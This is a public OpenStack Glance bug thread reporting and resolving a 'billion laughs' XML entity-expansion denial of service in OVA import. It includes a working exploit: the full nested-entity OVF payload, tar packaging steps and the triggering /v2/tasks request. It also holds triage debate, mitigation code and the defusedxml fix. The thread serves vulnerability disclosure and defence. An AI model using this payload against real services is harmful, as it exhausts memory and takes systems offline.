Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py

Bug #1625402 reported by Charles Neill on 2016-09-20
This bug affects 3 people
Affects                      Importance  Assigned to
Glance                       Low         Unassigned
OpenStack Security Advisory  Undecided   Unassigned

Bug Description

Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.

This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.

As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" entity expansion attack when parsing untrusted input [3].
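
To make the amplification concrete, here is a minimal sketch of the arithmetic behind nested entity expansion. It assumes the shape of the proof-of-concept payload in this report (a 3-character base entity and ten levels, each referencing the previous level ten times) and a parser that expands entities eagerly; the function name is hypothetical.

```python
def expanded_size(base_len: int, fanout: int, levels: int) -> int:
    """Characters produced when the top-level entity is fully expanded."""
    # Each level multiplies the previous level's size by `fanout`.
    return base_len * fanout ** levels


# "lol" is 3 characters; lol1..lol10 each repeat the previous entity 10 times.
size = expanded_size(base_len=3, fanout=10, levels=10)
print(size)
```

A payload of under a kilobyte on disk therefore asks the parser for tens of billions of characters, which is why the input size alone is not a useful limit.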

Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.

-----------------------------------------
Example request
-----------------------------------------

POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287

{
    "type": "import",
    "input": {
        "import_from": "http://127.0.0.1:9090/laugh.ova",
        "import_from_format": "raw",
        "image_properties": {
            "disk_format": "raw",
            "container_format": "ova",
     "name": "laugh"
        }
    }
}
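
For anyone reproducing this from a script, the request above could be assembled roughly as follows. This is only a sketch using the standard library: the URL and port are taken from the example request, the token value is a placeholder, and the request is built but deliberately not sent.

```python
import json
import urllib.request

GLANCE_URL = "http://localhost:1338/v2/tasks"  # host/port from the example request
TOKEN = "ADMIN-TOKEN-PLACEHOLDER"              # assumption: replace with a real admin token

task = {
    "type": "import",
    "input": {
        "import_from": "http://127.0.0.1:9090/laugh.ova",
        "import_from_format": "raw",
        "image_properties": {
            "disk_format": "raw",
            "container_format": "ova",
            "name": "laugh",
        },
    },
}

body = json.dumps(task).encode("utf-8")
request = urllib.request.Request(
    GLANCE_URL,
    data=body,
    method="POST",
    headers={
        "Content-Type": "application/json",
        "Accept": "application/json",
        "X-Auth-Token": TOKEN,
    },
)
# Not sent here; urllib.request.urlopen(request) would submit the task.
```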

-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------

"laugh.ova" can be created like so:

1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
 <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>

2. Create the OVA file (tarball) with the "tar" utility:

    $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova

3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:

    $ python -m SimpleHTTPServer 9090
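
The packaging in step 2 can also be done from Python. The sketch below is an illustration only: it uses a harmless two-level stand-in for laugh.ovf (an assumption, so that it is safe to run anywhere) and a hypothetical helper name, and writes into a temporary directory.

```python
import os
import tarfile
import tempfile

# Harmless stand-in for laugh.ovf: only two entity levels.
OVF = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;">
]>
<lolz>&lol1;</lolz>
"""


def build_ova(directory: str, ovf_bytes: bytes) -> str:
    """Write laugh.ovf and wrap it in an uncompressed tar named laugh.ova."""
    ovf_path = os.path.join(directory, "laugh.ovf")
    ova_path = os.path.join(directory, "laugh.ova")
    with open(ovf_path, "wb") as fh:
        fh.write(ovf_bytes)
    # Mode "w" produces a plain tar archive, like `tar -cf`.
    with tarfile.open(ova_path, "w") as tar:
        tar.add(ovf_path, arcname="laugh.ovf")
    return ova_path


with tempfile.TemporaryDirectory() as tmp:
    ova = build_ova(tmp, OVF)
    with tarfile.open(ova) as tar:
        members = tar.getnames()
print(members)
```

On Python 3, the equivalent of the SimpleHTTPServer command in step 3 is `python3 -m http.server 9090`.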

-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:

$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

After submitting this task twice (repeating calls to the above command):

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4]

-----------------------------------------
Mitigation
-----------------------------------------

Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5]
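
As an illustration of the kind of check such a library performs, here is a stdlib-only sketch. It is not defusedxml and not the Glance code: it is a hypothetical pre-check built on xml.parsers.expat that refuses any document declaring an entity, so that expansion never starts. The exception and function names are made up for this example.

```python
from xml.parsers import expat


class EntityDeclared(ValueError):
    """Raised when the document declares any entity in its DTD."""


def reject_entity_declarations(xml_bytes: bytes) -> None:
    """Parse the document once and fail on the first entity declaration."""
    parser = expat.ParserCreate()

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        # Called by expat for every <!ENTITY ...> declaration.
        raise EntityDeclared(name)

    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)


benign = b"<Envelope><File href='disk.vmdk'/></Envelope>"
hostile = b'<!DOCTYPE lolz [<!ENTITY lol "lol">]><lolz>&lol;</lolz>'

reject_entity_declarations(benign)  # passes silently
try:
    reject_entity_declarations(hostile)
    blocked = False
except EntityDeclared:
    blocked = True
print(blocked)
```

Rejecting all entity declarations is stricter than necessary for some XML, but OVF descriptors that need custom entities are presumably rare, so this seems like an acceptable trade-off for untrusted input.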

1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml

-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue).

description: updated

Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.

description: updated

It seems like the task api is admin only by default, so a vulnerable deployment also needs to have changed the task_add policy. Though this is likely a legitimate resource exhaustion denial of service vulnerability.

Can defusedxml work as a drop-in replacement for processing OVF files?

I wonder if this really needs to be kept private since the issue has been discussed publicly on the #openstack-security channel ( http://eavesdrop.openstack.org/irclogs/%23openstack-security/%23openstack-security.2016-09-16.log.html#t2016-09-16T18:09:15 ).

Brian Rosmaita (brian-rosmaita) wrote :

Here's an unhelpful comment. The OVA extraction task is extremely brittle and subject to several known attack vectors, as stated on the spec, which is a public document:

http://specs.openstack.org/openstack/glance-specs/specs/mitaka/implemented/ovf-lite.html#security-impact

The OVA extraction task should only be used by administrators and trusted users.

The xml-entity-expansion attack isn't mentioned in the spec, though.

Changed in glance:
status: New → Opinion
importance: Undecided → Low
Nikhil Komawar (nikhil-komawar) wrote :

I will second what Brian said; my comments (if posted earlier) would have been along the same lines.

Given the current state of tasks (no priority for their maintenance), the fact that they have been set up to be admin-only by default, and the tasks API being marked as deprecated https://github.com/openstack/glance/blob/c5dcf9021af609b81edc4a22c38ddf7bdd440cee/glance/api/v2/tasks.py#L46-L52 , we need not fix these issues. Mind you, we may NEVER get rid of the tasks API from the glance source tree.

But I'm not against giving a CVE notice for our ops friends who wish to use tasks api. So, that looks like a decent enough solution to this.

Besides, we can keep updating the spec with such details and add bug links to the same.

Nikhil Komawar (nikhil-komawar) wrote :

I've set the importance and status of the bug accordingly.

Nonetheless, I appreciate a "ton" that you raised this issue and made the community more aware. I'm sure a good level of sophistication went into setting up the tests and running them.

Charles Neill (charles-neill) wrote :

Thanks for the feedback, all! I agree that this isn't the highest of priority since it's an admin-only function, but I think a CVE/OSSA would still be helpful to ensure that anyone unaware of the task API's deprecation can patch this issue.

One additional thing that might be worth considering is that, because images can be imported from non-HTTPS links, an attacker in between the Glance server and the server hosting the image could inject a malicious image through a man-in-the-middle attack. Since there is no cryptographic verification of the image, an attacker with control of the server hosting the image could also replace it with a malicious one without the Glance administrator's knowledge.
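
To illustrate what cryptographic verification could look like, here is a minimal sketch that compares downloaded bytes against a SHA-256 digest obtained out of band. This is an assumption about one possible approach, not an existing Glance feature; the helper name is hypothetical.

```python
import hashlib
import hmac


def matches_pinned_digest(data: bytes, expected_sha256_hex: str) -> bool:
    """Return True only if the SHA-256 of `data` equals the pinned digest."""
    actual = hashlib.sha256(data).hexdigest()
    # compare_digest avoids leaking the mismatch position through timing.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())


image = b"example image bytes"
pinned = hashlib.sha256(image).hexdigest()  # in practice published by the image's owner

print(matches_pinned_digest(image, pinned))
print(matches_pinned_digest(image + b"tampered", pinned))
```

A check like this only helps if the pinned digest travels over a channel the attacker does not control.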

Nikhil Komawar (nikhil-komawar) wrote :

Yes, man-in-the-middle for copy-from/HTTP locations is indeed a real threat. But again, this is subject to your glance installation, configuration and network setup.

If ops think that man-in-the-middle is a threat to their deployment, they can be conservative about granting non-admin users access to HTTP-based location imports. Also, one can choose to set up network ACLs to restrict access to known (published) images (like fedora, ubuntu, centos, openstack community app-catalog public links etc.).
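
The same idea can be expressed at the application level as a source allowlist. The sketch below is hypothetical (the host name and function are placeholders, and this is not a Glance option): it accepts only HTTPS URLs whose host is on a known list.

```python
from urllib.parse import urlsplit

# Placeholder host; an operator would list the image mirrors they trust.
ALLOWED_HOSTS = {"images.example.org"}


def is_allowed_source(url: str) -> bool:
    """Accept only HTTPS URLs pointing at an explicitly trusted host."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


print(is_allowed_source("https://images.example.org/fedora.qcow2"))
print(is_allowed_source("http://127.0.0.1:9090/laugh.ova"))
```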

Based on comment #3, it seems like this report is a B3 according to VMT taxonomy ( https://security.openstack.org/vmt-process.html#incident-report-taxonomy ). I've switched the task to Opinion until an OSSN is defined or not.

Changed in ossa:
status: New → Incomplete
status: Incomplete → Opinion
Travis McPeak (travis-mcpeak) wrote :

Yeah agreed, since it's non-default config this is OSSN territory. Also since the issue was discussed on IRC I think we can make it public (which expands the pool of people that can work on the note).

DefusedXML has never been added to G-R, so there is no safe way to parse untrusted XML. I don't remember what the blocker was... I'll post something on ML about it.

Jeremy Stanley (fungi) wrote :

Agreed on the already public nature of this, I've switched the status accordingly.

information type: Private Security → Public
Charles Neill (charles-neill) wrote :

I'm not sure I agree with the assessment that this isn't default functionality. The only thing required to enable the vulnerability is to specify an appropriate "work_dir" in Glance's configuration. If this is an unlikely or unreasonable thing to do, then I agree that this is a less severe issue.

It is admittedly admin-only functionality, may not be widely used, and might be seen as deprecated by the project team, but the documentation on Tasks (which is one mechanism at play in this bug) does not in any way note that it is pending deprecation [1]. Neither are OVA/OVF images mentioned as deprecated. There are public YouTube videos explaining how to import these images [2], suggesting that at least some people are interested in using this functionality.

Not trying to be alarmist, just trying to better understand the classification.

[1] http://developer.openstack.org/api-ref/image/v2/index.html?expanded=create-task-detail
[2] https://www.youtube.com/watch?v=_zyFzElwwW0

Jeremy Stanley (fungi) on 2016-09-28
description: updated
Jeremy Stanley (fungi) wrote :

Charles: It looks like consensus has formed around this being a risk in an "experimental" feature (the implementation was added with known security caveats and so limited to admin users until those could be solved). Rather than trying to get patches for it backported to earlier supported releases and a security advisory sent recommending applying those patches, a security note may be drafted better describing these risks so that deployers are more aware and can avoid them.

Charles Neill (charles-neill) wrote :

Okay, so it mainly comes down to the implemented spec describing it as experimental, and the reduced likelihood of exploit based on it being admin-only. Good to know for future bugs, thanks.

Travis McPeak (travis-mcpeak) wrote :

I don't think it matters how the feature is described in the spec. If it's on by default it's not experimental.

Restricted to admin definitely lowers impact though.

Ian Cordasco (icordasc) wrote :

So I'm confused. If something requires configuration before it will work, is that on by default?

work_dir defaults to none. That means it will not allow tasks to run by default. Is that default in a way that I'm not understanding?

Rahul U Nair (rahulunair) wrote :

Ian, so the only `configuration` that is needed is to set a work_dir for the glance service. The work_dir is used by the service for any sort of async operations it has to do on an image.
Because the glance work_dir is not writable by default in devstack, we have to set one, but this feature (import OVA file task) is on by default. After a writable dir has been set, an admin can execute this attack.

In the spec, even though some security considerations were raised, specifically on gzip expansion and tar privilege escalation, I couldn't find any discussion of attacks similar to the Billion laughs one. Also, it has not been stated that this feature is going to be deprecated. I feel it would be helpful for operators to know about this vulnerability, so that they can take the necessary action.

Ian Cordasco (icordasc) wrote :

> but this feature(import OVA file task) is on by default.

How is this on by default if you need to set the option in the config for it to work? Do you mean the API is something that you can send requests to?

What I keep hearing is "We can't exploit this with the default config but we consider this a higher priority because it's exploitable by default" and that's not making sense.

Charles Neill (charles-neill) wrote :

I guess what I was trying to get at was, you have to e.g. set usernames/passwords in your configuration files before services relying on Keystone become useful. But I don't think anyone would call defining such variables "non-default" behavior.

My uncertainty is this: is "work_dir" usually set by reasonable operators to make Glance work as expected? I imagine that Glance avoids setting a default because 1) it can trigger significant disk usage for whatever folder is selected, and 2) Glance can't always predict what device will be the right one to choose to accommodate that disk usage, so rather than accidentally filling e.g. your /usr/ drive, it forces you to define it yourself. This is similar to services not necessarily specifying defaults for Keystone creds, since it would be unreasonable to assume that "admin/admin" would work by default anyway.

Rahul U Nair (rahulunair) wrote :

What I understood from reading the glance config is that the option `work_dir` is used by the glance service for any async operation it has to do on images before the image is imported[1], this is not exclusive to the OVA import task. Thus the work_dir option may be set by the cloud operator for other reasons as well, not only to import an OVA image.

[1]. http://docs.openstack.org/mitaka/config-reference/image-service.html

Ian Cordasco (icordasc) wrote :

> But I don't think anyone would call defining such variables "non-default" behavior.

Charles, Glance doesn't require Keystone. That said, configuring the identity service is a far cry from setting up tasks to work. Beyond anecdotal evidence from meetings where operators were asked "Do you use tasks?" and said "I didn't know that existed", I don't know whether operators supply every non-required configuration value.

You can also specify a location for glance to store images on the local filesystem, but if people are using ceph, swift, or vmware they're not going to specify that.

"It's optional but people fill in optional config values too" isn't sufficient to make this on by default.

> Thus the work_dir option may be set by the cloud operator for other reasons as well, not only to import an OVA image.

Rahul, every person on this thread associated with Glance has said exactly that. That still doesn't make this on by default (which is the point you and Charles are trying to push). Yes that means people may have a problem with this if they've enabled other tasks. Yes that's exactly what an OSSN would serve to address (educating folks about the potential for attacks by highly trusted users of the cloud if they're using a deprecated API).

Thanks everyone for all the thought and effort on this issue.

Here's a summary of the situation:

(1) the ova extraction task was introduced in mitaka
(2) the tasks api was made admin only by default in mitaka
(3) the ova extraction task is admittedly fragile and subject to various exploits
(4) there is an extra check in the task to make sure the context is admin before the task is executed [0,1]
(5) the task doesn't execute unless the work_dir (used only by tasks) is set

I think this leaves us in the situation that Nikhil described earlier, namely, that a security note is the correct course of action, mainly to remind operators to be careful in handling images from non-reputable sources.

[0] https://github.com/openstack/glance/blob/stable/mitaka/glance/async/flows/ovf_process.py#L91-L96
[1] https://github.com/openstack/glance/blob/stable/newton/glance/async/flows/ovf_process.py#L91-L96

Charles Neill (charles-neill) wrote :

@Brian: Thanks for the follow-up. I was just trying to figure out whether "work_dir" is commonly enabled by operators or not (which is kind of like asking you to look into an "operator crystal ball", I realize). I know that it must be specified manually, and that it would likely only be enabled if Tasks access was desired - I was just trying to assess whether enabling Tasks is something that happens 10% of the time or 90% of the time. At this point, barring any further comments, it seems the answer is that this is rare.

@Ian: We're not trying to push some hidden agenda here. I think my questions have been pretty clear, and focused on one thing: Is this something most reasonable operators enable? I can't quantify this bug's likelihood of impact if I don't at least have a fuzzy answer to that question. My goal was simply to understand how much exposure there is likely to be in the community, and to align the response we make with the actual risk that is presented. Based on what I've seen, an OSSN seems reasonable.

I bring up Keystone credentials (as used in many OpenStack services - not Glance, specifically) merely as an example of a configuration variable without a default value, but that would not make sense to leave undefined in 90% of situations. Without opinions from people more knowledgeable about Glance than myself, I can't make that determination.

My guess is that we are using incompatible definitions of the phrase "by default." My take is, if it enables functionality that most sane operators want/need, and is therefore defined in almost all cases, it is a de-facto default whether or not there is a sane default provided in the service's example configuration file. It seems your definition is "is this specified in the configuration file by default," which I already know the answer to (no). So far I have not received an explicit answer to my question, but as stated above, I guess I have to assume that this means operator usage is not common.

Ian Cordasco (icordasc) wrote :

> My guess is that we are using incompatible definitions of the phrase "by default." My take is, if it enables functionality that most sane operators want/need, and is therefore defined in almost all cases, it is a de-facto default whether or not there is a sane default provided in the service's example configuration file. It seems your definition is "is this specified in the configuration file by default," which I already know the answer to (no).

Right. I suspect that's why we seem to be talking past each other. "by default" means to me, there's a default in the config file such that this is always on even if the operator doesn't intend it to be.

You're asking for the % of operators using this and we have no way of knowing that.

> So far I have not received an explicit answer to my question, but as stated above, I guess I have to assume that this means operator usage is not common.

As I mentioned above, the only answer I can give you is based on anecdotal evidence of the "Tasks exists?" response from operators. Since this is wide open, you can post this to the openstack-operators list to see if people paying attention there will weigh in.

Charles Neill (charles-neill) wrote :

This bug involving tasks and "qemu-img" [1] seems to have been assigned a CVE and resulted in an OSSA. Curious what the difference is when both of these are resource exhaustion attacks achieved through the Glance tasks API. It was marked as "Critical" for Mitaka in that case.

[1]: https://bugs.launchpad.net/ossa/+bug/1449062

The difference is that the ova task wasn't introduced until mitaka, at the same time the tasks api was made admin-only by default.

Jeremy Stanley (fungi) wrote :

To a great extent this is determined by how fixable it is. If there are patches proposed which can non-disruptively mitigate this behavior in all supported stable branches of Glance, and if the Glance core reviewers and stable branch managers agree on the approach, the VMT may issue a security advisory. If not, something like this generally gets documented with a security note instead.

The bug for OSSA 2016-012 was being tracked primarily as a risk in Nova with functions that were not (nor intended to be) limited strictly to admins, but when similar behavior was found duplicated in Cinder and Glance the patches for Nova were ported to them for completeness and they were included in the advisory.

As to Hemanth's choice of high/critical importance on the Glance bugtasks he added, I can only assume he was using them to indicate how soon he intended to push the patches through. I don't generally expect those to reflect the severity of a bug, but rather represent personal workflow. Different developer teams have different policies for their task tracking metadata however, so I won't presume to speak for Hemanth or the Glance team in this regard.

Charles Neill (charles-neill) wrote :

Thanks for your responses, Brian & Jeremy. I think I have a much better idea of the factors that determine risk/response from an OpenStack perspective after participating in this thread, and will keep them in mind for future bugs. Cheers!

Charles Neill (charles-neill) wrote :

Any new thoughts on this? Should I reach out to MITRE about getting a CVE assigned?

Ian Cordasco (icordasc) wrote :

Charles,

I thought the consensus here was to not request a CVE for this. Did I miss some update that has shifted the consensus?

Jeremy Stanley (fungi) wrote :

Anyone's welcome to request a CVE assignment for a bug report. The OpenStack VMT isn't going to request one themselves because they don't plan to issue an advisory about this one, and it doesn't look like there are plans for the Glance team to "fix" it anyway.

Patch uses https://pypi.python.org/pypi/defusedxml to address the "billion laughs" vulnerability:
https://review.openstack.org/#/c/537855/

Changed in glance:
milestone: none → queens-rc1
status: Opinion → In Progress
assignee: nobody → Vladislav Kuzmin (vkuzmin-u)

Reviewed: https://review.openstack.org/537855
Committed: https://git.openstack.org/cgit/openstack/glance/commit/?id=6e82ea023a63b74b49d94f4e65b0a7cd3e0c49f6
Submitter: Zuul
Branch: master

commit 6e82ea023a63b74b49d94f4e65b0a7cd3e0c49f6
Author: Vladislav Kuzmin <email address hidden>
Date: Thu Jan 25 15:11:39 2018 +0400

    Replace xml defusedxml

    xml was considered as vulnerable to different atacks.
    It is recommended to replace this library with defused_xml

    Change-Id: I2b146dc34ada37a3ed9ecf49513d024a8ca2fb19
    Related-Bug: #1625402

defusedxml specifically protects against the entity expansion attack that's the subject of this particular bug [0], so closing it.

[0] https://pypi.python.org/pypi/defusedxml#id11
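
For readers who want to see the behaviour described here, the following is a small sketch of defusedxml rejecting a document that declares entities. It is not the committed patch: the test document and helper name are made up, and the import is guarded because defusedxml is a third-party package that may not be installed.

```python
import io

try:
    # Third-party package; not part of the standard library.
    from defusedxml import EntitiesForbidden
    from defusedxml.ElementTree import iterparse
except ImportError:
    iterparse = None

HOSTILE = b'<!DOCTYPE lolz [<!ENTITY lol "lol">]><lolz>&lol;</lolz>'


def is_rejected(xml_bytes: bytes) -> bool:
    """True if defusedxml refuses the document because it declares entities."""
    try:
        for _event, _elem in iterparse(io.BytesIO(xml_bytes)):
            pass
    except EntitiesForbidden:
        return True
    return False


if iterparse is not None:
    print(is_rejected(HOSTILE))
```

Because the exception is raised when the entity is declared, the parser never reaches the point of expanding it.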

Changed in glance:
assignee: Vladislav Kuzmin (vkuzmin-u) → nobody
status: In Progress → Fix Released

Change abandoned by Vladislav Kuzmin (<email address hidden>) on branch: stable/pike
Review: https://review.openstack.org/539967
Reason: global-requirements for stable/pike doesn't contain defusedxml
